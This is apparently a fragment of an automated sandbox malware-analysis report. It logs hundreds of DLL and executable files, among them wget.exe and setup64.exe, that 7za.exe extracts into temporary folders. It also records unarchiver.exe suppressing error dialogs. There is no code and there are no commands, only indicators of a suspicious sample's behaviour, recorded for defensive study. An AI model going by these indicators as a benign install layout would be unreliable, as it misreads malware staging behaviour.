Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GUISkin.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_video_framerate.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefSphereTree.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_video_framerate.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dt_shmem.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_mux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\gstreamer-lite.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\java.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\javafx_font.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\setup64.exe
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\npt.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JavaAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_Camera.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\verify.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\management.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\WindowsAccessBridge-32.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\ObjectDataCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\d3dcompiler_47.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\Object.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageMetaData.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\wget.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\TextFilter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\libGLESv2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\hprof.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceUnique.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\glib-lite.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2ssv.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\ImageStitcher.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_enc_mp2sr.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceRefTree.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\w2k_lsa_auth.dll
Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_demux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\ImageMetaData.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2iexp.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mfc100cht.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jawt.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dt_socket.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\boost_system.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FModSound.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mfc100chs.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\wsdetect.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jpeg.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GPUPerfAPIDX11-x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\sunmscapi.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\d3dcompiler_47.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_mp2sr.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\decora_sse.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\nio.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\lcms.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCreation.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\boost_system.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp2m.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_SoundFile2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\zip.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_Modules_DataIO_1.4.22_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PlugPlugExternalObject.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mpa.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Tesselator.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\instrument.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jsoundds.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp2v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\net.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceFunction.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_Modules_DataIO_1.4.22_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\bci.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GFSDK_ShadowLib.win64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\setup64.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100PDFL.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\SceneContainerCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_enc_mp2sr.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\t2k.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\7z.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\sunec.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\dcpr.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\InterfaceCreation.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_config_mp4v.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\WinRAR.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\CGRCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\splashscreen.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\GroupBuffer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InstanceContainer.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DL100AGM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\InterfaceCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\FloatTexture.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\boost_system.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100chs.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\FileLoader.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\StyleTransfer.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_demux_dv.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\setup64.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\adbeape.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_UserInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\JSONCommand.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_SysInfo.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jli.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\XMLDOMCommand.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_MotionSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jfr.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\DX8_TextOut.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_DirectInput.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\prism_common.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\PRM.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\MXF_SDK_GenericContainer_SystemScheme1_4.5.16_vs10.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\ESM_SaveTextFile.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\bin\InterfaceChannel.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mpa.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\GPUPerfAPIDX11-x64.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_enc_pcm.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\fxplugins.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\Internet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\libGLESv2.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\CopyImage.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_mux_dv.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\PRM.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_trans_audio_converter.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\msvcp120.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\WindowsAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\MXF_SDK_GenericContainer_AVI_4.5.16_vs10.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\jp2native.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\ImageStitcher.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\data\mc_config_mp4v.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\DirectX\7z.exeJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mfc100cht.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l\data\AppInfo\DirectX\wget.exe
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\config\img\DX8_MatrixInterpolateSet.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\data\mc_trans_audio_converter.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\deploy.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\mc_dec_spic.dllJump to dropped file
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\JAWTAccessBridge.dll
Source: C:\Windows\SysWOW64\7za.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\boe55dv2.gbx\data\AppInfo\platforms\jre\bin\glass.dll
